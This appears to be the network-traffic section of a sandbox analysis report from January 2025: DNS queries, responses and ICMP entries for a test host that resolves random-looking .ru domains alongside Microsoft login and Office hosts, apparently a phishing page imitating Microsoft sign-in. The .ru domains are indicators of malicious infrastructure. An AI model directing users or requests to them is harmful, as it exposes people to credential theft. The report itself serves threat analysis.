                                                                        Jan 16, 2025 09:20:17.354715109 CET53635591.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.054186106 CET6437153192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.054743052 CET5710153192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.061045885 CET53643711.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.061865091 CET53571011.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.122661114 CET5504453192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.122833967 CET6199953192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.129394054 CET53550441.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.129540920 CET53619991.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.631434917 CET6180853192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.631866932 CET5448953192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.638197899 CET53618081.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.638545036 CET53544891.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.655255079 CET6190053192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.655606985 CET5283553192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:18.662144899 CET53528351.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:18.662513018 CET53619001.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:20.702418089 CET5831253192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:20.702549934 CET6260953192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:20.709204912 CET53583121.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:20.709256887 CET53626091.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:28.125340939 CET53529721.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.162530899 CET6335753192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:33.162956953 CET6275453192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:33.172919989 CET53627541.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:33.254396915 CET53633571.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:35.727258921 CET5794753192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:35.727756023 CET5112153192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:35.733127117 CET5049253192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:35.733258009 CET5784953192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:35.743583918 CET53504921.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:35.785765886 CET53578491.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:36.813723087 CET6017153192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:36.813853979 CET6056553192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:36.846672058 CET53605651.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:38.785809040 CET5258653192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:38.786055088 CET5142953192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:38.797554970 CET53514291.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:40.093117952 CET5850553192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:40.093389988 CET5940553192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:45.255918980 CET53528701.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:47.203722954 CET53519381.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:20:53.182835102 CET5094253192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:20:53.182955027 CET5884353192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:21:09.738506079 CET53541991.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:21:10.169338942 CET53617111.1.1.1192.168.2.5
                                                                        Jan 16, 2025 09:21:20.709520102 CET6254153192.168.2.51.1.1.1
                                                                        Jan 16, 2025 09:21:20.709520102 CET5648453192.168.2.51.1.1.1
                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Jan 16, 2025 09:20:35.785854101 CET192.168.2.51.1.1.1c30d(Port unreachable)Destination Unreachable
                                                                        Jan 16, 2025 09:20:36.846760988 CET192.168.2.51.1.1.1c26c(Port unreachable)Destination Unreachable
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 16, 2025 09:20:14.458858013 CET192.168.2.51.1.1.10x3124Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:14.458915949 CET192.168.2.51.1.1.10x8ac1Standard query (0)www.google.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.745831013 CET192.168.2.51.1.1.10xa726Standard query (0)56.hanagibenewe.ruA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.746607065 CET192.168.2.51.1.1.10xa750Standard query (0)56.hanagibenewe.ru65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.341866016 CET192.168.2.51.1.1.10x9cd3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.342114925 CET192.168.2.51.1.1.10x90e2Standard query (0)code.jquery.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.342549086 CET192.168.2.51.1.1.10x2714Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.342740059 CET192.168.2.51.1.1.10x1a99Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.343058109 CET192.168.2.51.1.1.10xfd8aStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.347985983 CET192.168.2.51.1.1.10x6ae4Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.054186106 CET192.168.2.51.1.1.10x755Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.054743052 CET192.168.2.51.1.1.10xa296Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.122661114 CET192.168.2.51.1.1.10x1f8fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.122833967 CET192.168.2.51.1.1.10x39b5Standard query (0)code.jquery.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.631434917 CET192.168.2.51.1.1.10xbb0aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.631866932 CET192.168.2.51.1.1.10x237fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.655255079 CET192.168.2.51.1.1.10xbbe1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.655606985 CET192.168.2.51.1.1.10xe067Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:20.702418089 CET192.168.2.51.1.1.10x71dfStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:20.702549934 CET192.168.2.51.1.1.10x62c3Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.162530899 CET192.168.2.51.1.1.10x948Standard query (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ruA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.162956953 CET192.168.2.51.1.1.10x4e79Standard query (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.727258921 CET192.168.2.51.1.1.10xbbfaStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.727756023 CET192.168.2.51.1.1.10xf7f6Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.733127117 CET192.168.2.51.1.1.10xb9eStandard query (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ruA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.733258009 CET192.168.2.51.1.1.10xcfd3Standard query (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.813723087 CET192.168.2.51.1.1.10x9e70Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.813853979 CET192.168.2.51.1.1.10x8cdeStandard query (0)www.office.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.785809040 CET192.168.2.51.1.1.10x9587Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.786055088 CET192.168.2.51.1.1.10x6895Standard query (0)www.office.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.093117952 CET192.168.2.51.1.1.10x9038Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.093389988 CET192.168.2.51.1.1.10x2220Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.182835102 CET192.168.2.51.1.1.10xa0f0Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.182955027 CET192.168.2.51.1.1.10x1779Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.709520102 CET192.168.2.51.1.1.10xb163Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:21:20.709520102 CET192.168.2.51.1.1.10x1024Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 16, 2025 09:20:14.465795994 CET1.1.1.1192.168.2.50x3124No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:14.465841055 CET1.1.1.1192.168.2.50x8ac1No error (0)www.google.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.764837980 CET1.1.1.1192.168.2.50xa750No error (0)56.hanagibenewe.ru65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.807476044 CET1.1.1.1192.168.2.50xa726No error (0)56.hanagibenewe.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.807476044 CET1.1.1.1192.168.2.50xa726No error (0)56.hanagibenewe.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.807476044 CET1.1.1.1192.168.2.50xa726No error (0)56.hanagibenewe.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.807476044 CET1.1.1.1192.168.2.50xa726No error (0)56.hanagibenewe.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.807476044 CET1.1.1.1192.168.2.50xa726No error (0)56.hanagibenewe.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.807476044 CET1.1.1.1192.168.2.50xa726No error (0)56.hanagibenewe.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:15.807476044 CET1.1.1.1192.168.2.50xa726No error (0)56.hanagibenewe.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349164009 CET1.1.1.1192.168.2.50x9cd3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349164009 CET1.1.1.1192.168.2.50x9cd3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349164009 CET1.1.1.1192.168.2.50x9cd3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349164009 CET1.1.1.1192.168.2.50x9cd3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349185944 CET1.1.1.1192.168.2.50x2714No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349185944 CET1.1.1.1192.168.2.50x2714No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349462986 CET1.1.1.1192.168.2.50x1a99No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349514008 CET1.1.1.1192.168.2.50xfd8aNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.349514008 CET1.1.1.1192.168.2.50xfd8aNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:17.354715109 CET1.1.1.1192.168.2.50x6ae4No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.061045885 CET1.1.1.1192.168.2.50x755No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.061045885 CET1.1.1.1192.168.2.50x755No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.061865091 CET1.1.1.1192.168.2.50xa296No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.129394054 CET1.1.1.1192.168.2.50x1f8fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.129394054 CET1.1.1.1192.168.2.50x1f8fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.129394054 CET1.1.1.1192.168.2.50x1f8fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.129394054 CET1.1.1.1192.168.2.50x1f8fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.638197899 CET1.1.1.1192.168.2.50xbb0aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.638197899 CET1.1.1.1192.168.2.50xbb0aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.638545036 CET1.1.1.1192.168.2.50x237fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.662144899 CET1.1.1.1192.168.2.50xe067No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.662513018 CET1.1.1.1192.168.2.50xbbe1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:18.662513018 CET1.1.1.1192.168.2.50xbbe1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:20.709204912 CET1.1.1.1192.168.2.50x71dfNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.172919989 CET1.1.1.1192.168.2.50x4e79No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.254396915 CET1.1.1.1192.168.2.50x948No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.254396915 CET1.1.1.1192.168.2.50x948No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.254396915 CET1.1.1.1192.168.2.50x948No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.254396915 CET1.1.1.1192.168.2.50x948No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.254396915 CET1.1.1.1192.168.2.50x948No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.254396915 CET1.1.1.1192.168.2.50x948No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:33.254396915 CET1.1.1.1192.168.2.50x948No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736582994 CET1.1.1.1192.168.2.50xf7f6No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736582994 CET1.1.1.1192.168.2.50xf7f6No error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736582994 CET1.1.1.1192.168.2.50xf7f6No error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.14A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.138A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.17A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.74A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.136A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.22A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.72A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.736887932 CET1.1.1.1192.168.2.50xbbfaNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.133A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.743583918 CET1.1.1.1192.168.2.50xb9eNo error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.743583918 CET1.1.1.1192.168.2.50xb9eNo error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.743583918 CET1.1.1.1192.168.2.50xb9eNo error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.743583918 CET1.1.1.1192.168.2.50xb9eNo error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.743583918 CET1.1.1.1192.168.2.50xb9eNo error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.743583918 CET1.1.1.1192.168.2.50xb9eNo error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.743583918 CET1.1.1.1192.168.2.50xb9eNo error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:35.785765886 CET1.1.1.1192.168.2.50xcfd3No error (0)oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru65IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.823304892 CET1.1.1.1192.168.2.50x9e70No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.823304892 CET1.1.1.1192.168.2.50x9e70No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.823304892 CET1.1.1.1192.168.2.50x9e70No error (0)home-office365-com.b-0004.b-msedge.netb-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.823304892 CET1.1.1.1192.168.2.50x9e70No error (0)b-0004.b-msedge.net13.107.6.156A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.846672058 CET1.1.1.1192.168.2.50x8cdeNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:36.846672058 CET1.1.1.1192.168.2.50x8cdeNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:37.965866089 CET1.1.1.1192.168.2.50x4228No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:37.965866089 CET1.1.1.1192.168.2.50x4228No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.760591984 CET1.1.1.1192.168.2.50x58ebNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.760591984 CET1.1.1.1192.168.2.50x58ebNo error (0)azurefd-t-fb-prod.trafficmanager.netdual.s-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.760591984 CET1.1.1.1192.168.2.50x58ebNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.760591984 CET1.1.1.1192.168.2.50x58ebNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.797538996 CET1.1.1.1192.168.2.50x9587No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.797538996 CET1.1.1.1192.168.2.50x9587No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.797538996 CET1.1.1.1192.168.2.50x9587No error (0)home-office365-com.b-0004.b-msedge.netb-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.797538996 CET1.1.1.1192.168.2.50x9587No error (0)b-0004.b-msedge.net13.107.6.156A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.797554970 CET1.1.1.1192.168.2.50x6895No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:38.797554970 CET1.1.1.1192.168.2.50x6895No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100091934 CET1.1.1.1192.168.2.50x9038No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100091934 CET1.1.1.1192.168.2.50x9038No error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100091934 CET1.1.1.1192.168.2.50x9038No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100091934 CET1.1.1.1192.168.2.50x9038No error (0)e329293.dscd.akamaiedge.net2.23.209.34A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100091934 CET1.1.1.1192.168.2.50x9038No error (0)e329293.dscd.akamaiedge.net2.23.209.17A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100574970 CET1.1.1.1192.168.2.50x2220No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100574970 CET1.1.1.1192.168.2.50x2220No error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:40.100574970 CET1.1.1.1192.168.2.50x2220No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.20A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.68A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.136A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.138A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.160.22A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.134A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.74A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189855099 CET1.1.1.1192.168.2.50xa0f0No error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.32.72A (IP address)IN (0x0001)false
                                                                        Jan 16, 2025 09:20:53.189898968 CET1.1.1.1192.168.2.50x1779No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
